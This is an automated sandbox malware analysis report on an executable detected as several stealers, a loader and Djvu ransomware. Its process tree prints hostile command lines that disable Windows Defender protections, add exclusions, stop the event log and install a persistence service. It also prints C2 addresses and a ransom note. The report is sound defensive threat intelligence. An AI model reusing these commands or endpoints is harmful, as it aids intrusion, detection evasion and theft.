Edit tour

Windows Analysis Report
284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe

Overview

General Information

Sample name:	284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe
Analysis ID:	1491008
MD5:	a412795f68e5dae5fbae528595b96916
SHA1:	e2f386ce478fbad462a873e656eea85dce550815
SHA256:	284ae9899ae53d03d27bd3f72892d843fe5bbecb097f52fc0b1b37d1040401d0
Tags:	exeStop
Infos:

Detection

Amadey, DarkTortilla, Djvu, LummaC Stealer, RedLine, Stealc, Vidar

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Antivirus detection for dropped file

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: Disable power options

Sigma detected: Stop EventLog

Yara detected Amadey

Yara detected Amadeys stealer DLL

Yara detected AntiVM3

Yara detected DarkTortilla Crypter

Yara detected Djvu Ransomware

Yara detected LummaC Stealer

Yara detected MSILDownloaderGeneric

Yara detected Powershell download and execute

Yara detected RedLine Stealer

Yara detected Stealc

Yara detected Vidar stealer

Yara detected Xmrig cryptocurrency miner

.NET source code contains potential unpacker

AI detected suspicious sample

Adds extensions / path to Windows Defender exclusion list (Registry)

Allocates memory in foreign processes

C2 URLs / IPs found in malware configuration

Contains functionality to inject code into remote processes

Creates HTML files with .exe extension (expired dropper behavior)

Disable Windows Defender real time protection (registry)

Disables Windows Defender (deletes autostart)

Drops PE files to the document folder of the user

Exclude list of file types from scheduled, custom, and real-time scanning

Found direct / indirect Syscall (likely to bypass EDR)

Found many strings related to Crypto-Wallets (likely being stolen)

Hides that the sample has been downloaded from the Internet (zone.identifier)

Injects a PE file into a foreign processes

Machine Learning detection for dropped file

Machine Learning detection for sample

Modifies Group Policy settings

Modifies Windows Defender protection settings

Modifies power options to not sleep / hibernate

Modifies the context of a thread in another process (thread injection)

Overwrites code with unconditional jumps - possibly settings hooks in foreign process

Performs DNS queries to domains with low reputation

Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Sample is not signed and drops a device driver

Sample uses process hollowing technique

Sample uses string decryption to hide its real strings

Sigma detected: Silenttrinity Stager Msbuild Activity

Tries to harvest and steal Bitcoin Wallet information

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Crypto Currency Wallets

Uses powercfg.exe to modify the power settings

Writes to foreign memory regions

Yara detected Generic Downloader

Allocates memory with a write watch (potentially for evading sandboxes)

Binary contains a suspicious time stamp

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Checks if the current process is being debugged

Contains capabilities to detect virtual machines

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to dynamically determine API calls

Contains functionality to launch a process as a different user

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates driver files

Creates files inside the system directory

Creates or modifies windows services

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Downloads executable code via HTTP

Dropped file seen in connection with other malware

Drops PE files

Drops PE files to the application program directory (C:\ProgramData)

Drops PE files to the windows directory (C:\Windows)

Enables debug privileges

Entry point lies outside standard sections

Found dropped PE file which has not been started or loaded

Found inlined nop instructions (likely shell or obfuscated code)

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Installs a raw input device (often for capturing keystrokes)

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

PE file contains sections with non-standard names

Queries disk information (often used to detect virtual machines)

Queries information about the installed CPU (vendor, model number etc)

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Suspicious PowerShell Invocations - Specific - ProcessCreation

Sigma detected: Windows Defender Exclusions Added - Registry

Sigma detected: Wow6432Node CurrentVersion Autorun Keys Modification

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses reg.exe to modify the Windows registry

Uses the system / local time for branch decision (may execute only at specific dates)

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe (PID: 7008 cmdline: "C:\Users\user\Desktop\284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe" MD5: A412795F68E5DAE5FBAE528595B96916)

9SPLMMrYRskiaGUcrT9MofKl.exe (PID: 5516 cmdline: C:\Users\user\Documents\piratemamm\9SPLMMrYRskiaGUcrT9MofKl.exe MD5: 381F228FC02E9927F1F2145B8AD5696E)

Install.exe (PID: 3244 cmdline: .\Install.exe MD5: 2679FAC73DF5510DE7D16E88EDD0EE31)

Install.exe (PID: 4916 cmdline: .\Install.exe /qiFwdidsyGaM "525403" /S MD5: 83D1F62BB73920D3D4603BE2EEAB0192)

cmd.exe (PID: 3964 cmdline: "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 4164 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

forfiles.exe (PID: 3288 cmdline: forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" MD5: D95C443851F70F77427B3183B1619DD3)

cmd.exe (PID: 5664 cmdline: /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

reg.exe (PID: 5124 cmdline: reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 MD5: CDD462E86EC0F20DE2A1D781928B1B0C)

forfiles.exe (PID: 3152 cmdline: "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m help.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True" MD5: D95C443851F70F77427B3183B1619DD3)

conhost.exe (PID: 2412 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

bQnXcKn6ehLDJGqEStjbnSyC.exe (PID: 2076 cmdline: C:\Users\user\Documents\piratemamm\bQnXcKn6ehLDJGqEStjbnSyC.exe MD5: B8D875D94FBD7DF91B1DBBBC308A057F)

bQnXcKn6ehLDJGqEStjbnSyC.exe (PID: 3156 cmdline: C:\Users\user\Documents\piratemamm\bQnXcKn6ehLDJGqEStjbnSyC.exe MD5: B8D875D94FBD7DF91B1DBBBC308A057F)

eROo1ugNChgONSxoiS6DxyMi.exe (PID: 1028 cmdline: C:\Users\user\Documents\piratemamm\eROo1ugNChgONSxoiS6DxyMi.exe MD5: F5B93D3369D1AE23D6E150E75D2B6A80)

NjdbLPleIutA8FKI_S3fRztd.exe (PID: 180 cmdline: C:\Users\user\Documents\piratemamm\NjdbLPleIutA8FKI_S3fRztd.exe MD5: D7528CD33B73718B5949277420681F90)

NoCZBiPwAcSyoDte_ne2sJt7.exe (PID: 2872 cmdline: C:\Users\user\Documents\piratemamm\NoCZBiPwAcSyoDte_ne2sJt7.exe MD5: 45C0D8BEDD6BFF145CBE1C3064F2CF56)

MSBuild.exe (PID: 2024 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe" MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)

MSBuild.exe (PID: 5180 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe" MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)

mbnxbv_uftcj649iS9ilHBrA.exe (PID: 5228 cmdline: C:\Users\user\Documents\piratemamm\mbnxbv_uftcj649iS9ilHBrA.exe MD5: 488D85695B6E76307AA595F8DB6A48FC)

powercfg.exe (PID: 6016 cmdline: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)

conhost.exe (PID: 1244 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powercfg.exe (PID: 7104 cmdline: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)

conhost.exe (PID: 2488 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powercfg.exe (PID: 2056 cmdline: C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)

conhost.exe (PID: 1832 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powercfg.exe (PID: 6072 cmdline: C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)

conhost.exe (PID: 2700 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

sc.exe (PID: 5852 cmdline: C:\Windows\system32\sc.exe delete "VIFLJRPW" MD5: 3FB5CF71F7E7EB49790CB0E663434D80)

conhost.exe (PID: 7156 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

sc.exe (PID: 1716 cmdline: C:\Windows\system32\sc.exe create "VIFLJRPW" binpath= "C:\ProgramData\xprfjygruytr\etzpikspwykg.exe" start= "auto" MD5: 3FB5CF71F7E7EB49790CB0E663434D80)

conhost.exe (PID: 1464 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

sc.exe (PID: 7084 cmdline: C:\Windows\system32\sc.exe stop eventlog MD5: 3FB5CF71F7E7EB49790CB0E663434D80)

conhost.exe (PID: 4588 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

sc.exe (PID: 5196 cmdline: C:\Windows\system32\sc.exe start "VIFLJRPW" MD5: 3FB5CF71F7E7EB49790CB0E663434D80)

conhost.exe (PID: 6336 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

Dc25WcfSyV8lvRa9ThM7DR04.exe (PID: 1608 cmdline: C:\Users\user\Documents\piratemamm\Dc25WcfSyV8lvRa9ThM7DR04.exe MD5: 67D39F0CBBAB44B99FFFAF3A408B2088)

MSBuild.exe (PID: 1456 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe" MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)

HBnXrwXMNXUElNaizB6OqLMm.exe (PID: 2656 cmdline: C:\Users\user\Documents\piratemamm\HBnXrwXMNXUElNaizB6OqLMm.exe MD5: F46974F39AEBF4F4D039600F3881D6B6)

MSBuild.exe (PID: 2188 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe" MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)

yqnvj2zXKAsCMyFmEDrQLSxi.exe (PID: 2596 cmdline: C:\Users\user\Documents\piratemamm\yqnvj2zXKAsCMyFmEDrQLSxi.exe MD5: BA027CCB7DE0F4A3769F48136D183DBD)

nv.exe (PID: 6188 cmdline: "C:\Program Files (x86)\NetVoyager\nv.exe" MD5: BA027CCB7DE0F4A3769F48136D183DBD)

svchost.exe (PID: 6336 cmdline: C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

svchost.exe (PID: 6408 cmdline: C:\Windows\System32\svchost.exe -k NetSvcs -p -s NcaSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

svchost.exe (PID: 6388 cmdline: C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

svchost.exe (PID: 1880 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

etzpikspwykg.exe (PID: 5888 cmdline: C:\ProgramData\xprfjygruytr\etzpikspwykg.exe MD5: 488D85695B6E76307AA595F8DB6A48FC)

powercfg.exe (PID: 1868 cmdline: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)

conhost.exe (PID: 1464 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powercfg.exe (PID: 6024 cmdline: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)

conhost.exe (PID: 4228 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powercfg.exe (PID: 3328 cmdline: C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)

conhost.exe (PID: 3604 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powercfg.exe (PID: 2840 cmdline: C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)

conhost.exe (PID: 4412 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

conhost.exe (PID: 6292 cmdline: C:\Windows\system32\conhost.exe MD5: 0D698AF330FD17BEE3BF90011D49251D)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Amadey	Amadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware.	No Attribution	https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://asec.ahnlab.com/en/36634/ https://asec.ahnlab.com/en/41450/ https://asec.ahnlab.com/en/44504/ https://bitsight.com/blog/unveiling-socks5systemz-rise-new-proxy-service-privateloader-and-amadey	https://malpedia.caad.fkie.fraunhofer.de/details/win.amadey

Name	Description	Attribution	Blogpost URLs	Link
DarkTortilla	DarkTortilla is a complex and highly configurable .NET-based crypter that has possibly been active since at least August 2015. It typically delivers popular information stealers and remote access trojans (RATs) such as AgentTesla, AsyncRat, NanoCore, and RedLine. While it appears to primarily deliver commodity malware, Secureworks Counter Threat Unit (CTU) researchers identified DarkTortilla samples delivering targeted payloads such as Cobalt Strike and Metasploit. It can also deliver "addon packages" such as additional malicious payloads, benign decoy documents, and executables. It features robust anti-analysis and anti-tamper controls that can make detection, analysis, and eradication challenging.From January 2021 through May 2022, an average of 93 unique DarkTortilla samples per week were uploaded to the VirusTotal analysis service. Code similarities suggest possible links between DarkTortilla and other malware: a crypter operated by the RATs Crew threat group, which was active between 2008 and 2012, and the Gameloader malware that emerged in 2021.	No Attribution	https://www.secureworks.com/research/darktortilla-malware-analysis	https://malpedia.caad.fkie.fraunhofer.de/details/win.darktortilla

Name	Description	Attribution	Blogpost URLs	Link
STOP, Djvu	STOP Djvu Ransomware it is a ransomware which encrypts user data through AES-256 and adds one of the dozen available extensions as marker to the encrypted file's name. It is not used to encrypt the entire file but only the first 5 MB. In its original version it was able to run offline and, in that case, it used a hard-coded key which could be extracted to decrypt files.	No Attribution	https://angle.ankura.com/post/102het9/the-stop-ransomware-variant https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.sekoia.io/privateloader-the-loader-of-the-prevalent-ruzki-ppi-service/ https://cybergeeks.tech/a-detailed-analysis-of-the-stop-djvu-ransomware/ https://cybleinc.com/2021/06/21/djvu-malware-of-stop-ransomware-family-back-with-new-variant/	https://malpedia.caad.fkie.fraunhofer.de/details/win.stop

Name	Description	Attribution	Blogpost URLs	Link
RedLine Stealer	RedLine Stealer is a malware available on underground forums for sale apparently as a standalone ($100/$150 depending on the version) or also on a subscription basis ($100/month). This malware harvests information from browsers such as saved credentials, autocomplete data, and credit card information. A system inventory is also taken when running on a target machine, to include details such as the username, location data, hardware configuration, and information regarding installed security software. More recent versions of RedLine added the ability to steal cryptocurrency. FTP and IM clients are also apparently targeted by this family, and this malware has the ability to upload and download files, execute commands, and periodically send back information about the infected computer.	No Attribution	https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://apophis133.medium.com/redline-technical-analysis-report-5034e16ad152 https://asec.ahnlab.com/en/30445/ https://asec.ahnlab.com/en/35981/ https://asec.ahnlab.com/ko/25837/	https://malpedia.caad.fkie.fraunhofer.de/details/win.redline_stealer

Name	Description	Attribution	Blogpost URLs	Link
Stealc	Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.	No Attribution	https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.sekoia.io/stealc-a-copycat-of-vidar-and-raccoon-infostealers-gaining-in-popularity-part-1/ https://blog.sekoia.io/stealc-a-copycat-of-vidar-and-raccoon-infostealers-gaining-in-popularity-part-2/ https://cocomelonc.github.io/book/2023/12/13/malwild-book.html https://g0njxa.medium.com/approaching-stealers-devs-a-brief-interview-with-stealc-cbe5c94b84af	https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Name	Description	Attribution	Blogpost URLs	Link
Vidar	Vidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser.	No Attribution	https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-1-(-Unpacking-)/ https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-2/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/vidar-stealer-h-and-m-campaign https://0xtoxin.github.io/malware%20analysis/Vidar-Stealer-Campaign/ https://asec.ahnlab.com/en/22932/	https://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

Malware Configuration

Threatname: StealC

{"C2 url": "http://147.45.47.59/d6f30af05ffe50bf.php"}

Threatname: Vidar

{"C2 url": ["https://steamcommunity.com/profiles/76561199751190313"], "Botnet": "de2cea1f145998409041f17e238ab295"}

Threatname: Djvu

{"Download URLs": [""], "C2 url": "http://cajgtus.com/test1/get.php", "Ransom note file": "_readme.txt", "Ransom note": "ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nDo not ask assistants from youtube and recovery data sites for help in recovering your data.\r\nThey can use your free decryption quota and scam you.\r\nOur contact is emails in this text document only.\r\nYou can get and look video overview decrypt tool:\r\nhttps://wetransfer.com/downloads/abe121434ad837dd5bdd03878a14485820240531135509/34284d\r\nPrice of private key and decrypt software is $999.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $499.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@freshingmail.top\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelpyou@airmail.cc\r\n\r\nYour personal ID:\r\n0874PsawqS", "Ignore Files": ["ntuser.dat", "ntuser.dat.LOG1", "ntuser.dat.LOG2", "ntuser.pol", ".sys", ".ini", ".DLL", ".dll", ".blf", ".bat", ".lnk", ".regtrans-ms", "C:\\SystemID\\", "C:\\Users\\Default User\\", "C:\\Users\\Public\\", "C:\\Users\\All Users\\", "C:\\Users\\Default\\", "C:\\Documents and Settings\\", "C:\\ProgramData\\", "C:\\Recovery\\", "C:\\System Volume Information\\", "C:\\Users\\%username%\\AppData\\Roaming\\", "C:\\Users\\%username%\\AppData\\Local\\", "C:\\Windows\\", "C:\\PerfLogs\\", "C:\\ProgramData\\Microsoft\\", "C:\\ProgramData\\Package Cache\\", "C:\\Users\\Public\\", "C:\\$Recycle.Bin\\", "C:\\$WINDOWS.~BT\\", "C:\\dell\\", "C:\\Intel\\", "C:\\MSOCache\\", "C:\\Program Files\\", "C:\\Program Files (x86)\\", "C:\\Games\\", "C:\\Windows.old\\", "D:\\Users\\%username%\\AppData\\Roaming\\", "D:\\Users\\%username%\\AppData\\Local\\", "D:\\Windows\\", "D:\\PerfLogs\\", "D:\\ProgramData\\Desktop\\", "D:\\ProgramData\\Microsoft\\", "D:\\ProgramData\\Package Cache\\", "D:\\Users\\Public\\", "D:\\$Recycle.Bin\\", "D:\\$WINDOWS.~BT\\", "D:\\dell\\", "D:\\Intel\\", "D:\\MSOCache\\", "D:\\Program Files\\", "D:\\Program Files (x86)\\", "D:\\Games\\", "E:\\Users\\%username%\\AppData\\Roaming\\", "E:\\Users\\%username%\\AppData\\Local\\", "E:\\Windows\\", "E:\\PerfLogs\\", "E:\\ProgramData\\Desktop\\", "E:\\ProgramData\\Microsoft\\", "E:\\ProgramData\\Package Cache\\", "E:\\Users\\Public\\", "E:\\$Recycle.Bin\\", "E:\\$WINDOWS.~BT\\", "E:\\dell\\", "E:\\Intel\\", "E:\\MSOCache\\", "E:\\Program Files\\", "E:\\Program Files (x86)\\", "E:\\Games\\", "F:\\Users\\%username%\\AppData\\Roaming\\", "F:\\Users\\%username%\\AppData\\Local\\", "F:\\Windows\\", "F:\\PerfLogs\\", "F:\\ProgramData\\Desktop\\", "F:\\ProgramData\\Microsoft\\", "F:\\Users\\Public\\", "F:\\$Recycle.Bin\\", "F:\\$WINDOWS.~BT\\", "F:\\dell\\", "F:\\Intel\\"], "Public Key": "-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAsZOJbLC8rdQ3RNFdWJ9l\\\\nsRHwDxjXZCN4K9IEo3ccj2X7KVzvLXJ\\/I+jMWoFDgbTA5TMMDPMhlSykGYr1rbX9\\\\ntDxs5EL7FC3R6jbLzQ+QVdvG2Slvd1aEiSAhkrB6Z97DC28ixTGkA4aCQKKFT5ge\\\\nSXPpDStS2N3zeiWPCMkOs9RErtxVW9sXoWRAFtBg2kSHTyKEWcRqnxplrJGdVQKU\\\\n0DxDnHDefnxaf\\/3VSRczBwGZlq\\/Mr2bfHM2Mf8JWmYztlmGbjGb\\/\\/oixuuRePxzt\\\\n6xgozgVrC64HnagNFyODdlk2w\\/BpJWXIbgivZ0kR40Ll3NEAl3Z26cIkIc6pAJ3s\\\\nfwIDAQAB\\\\n-----END PUBLIC KEY-----"}

Threatname: Amadey

{"C2 url": "api.garageserviceoperation.com/CoreOPT/index.php", "Version": "4.41"}

Threatname: RedLine

{"C2 url": "45.9.91.71:46967", "Bot Id": "test", "Message": "", "Authorization Header": "865df444adac1c44e9e7126852c2cca4"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author
dump.pcap	JoeSecurity_RedLine_1	Yara detected RedLine Stealer	Joe Security
dump.pcap	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
sslproxydump.pcap	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security

Dropped Files

Source	Rule	Description	Author
C:\Users\user\Documents\piratemamm\Dc25WcfSyV8lvRa9ThM7DR04.exe	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\66b5b75106ac6_stealc[1].exe	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
C:\Users\user\Documents\piratemamm\HBnXrwXMNXUElNaizB6OqLMm.exe	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\66b5ac1092454_otraba[1].exe	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\66b5d9d3adbaa_defaultr[1].exe	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
C:\Users\user\Documents\piratemamm\NoCZBiPwAcSyoDte_ne2sJt7.exe	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
Click to see the 1 entries

Memory Dumps

Source	Rule	Description	Author	Strings
00000009.00000002.2830297717.0000000004EC0000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_DarkTortilla	Yara detected DarkTortilla Crypter	Joe Security
0000000A.00000002.2963054220.0000000000647000.00000040.00000020.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x798:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000008.00000002.3000839541.0000000003DB1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
00000010.00000002.2467637502.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
00000009.00000002.2801068038.0000000003499000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000010.00000002.2547476892.0000000002AB4000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000024.00000002.2468755517.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
00000024.00000002.2468755517.0000000000400000.00000040.00000400.00020000.00000000.sdmp	MALWARE_Win_EXEPWSH_DLAgent	Detects SystemBC	ditekSHen	0x23af7:$pwsh: powershell 0x4aebf8:$s1: GET %s HTTP/1 0x25d080:$s4: LdrLoadDll 0x25ffbc:$s4: LdrLoadDll 0x26023d:$s4: LdrLoadDll 0x260cdf:$s4: LdrLoadDll 0xdfac0:$v6: start 0xe076a:$v6: start 0xe2f59:$v6: start 0xe2fc9:$v6: start 0xe32e6:$v6: start 0xe33c9:$v6: start 0xe3442:$v6: start 0xe40c6:$v6: start 0xe4fb7:$v6: start 0xf4260:$v6: start 0xf4277:$v6: start 0xf4293:$v6: start 0xf42ad:$v6: start 0xfd5bc:$v6: start 0xfe679:$v6: start
00000011.00000002.2691859636.00000000004DD000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
00000011.00000002.2691859636.00000000004DF000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
0000000B.00000002.2221257829.0000000004DD2000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
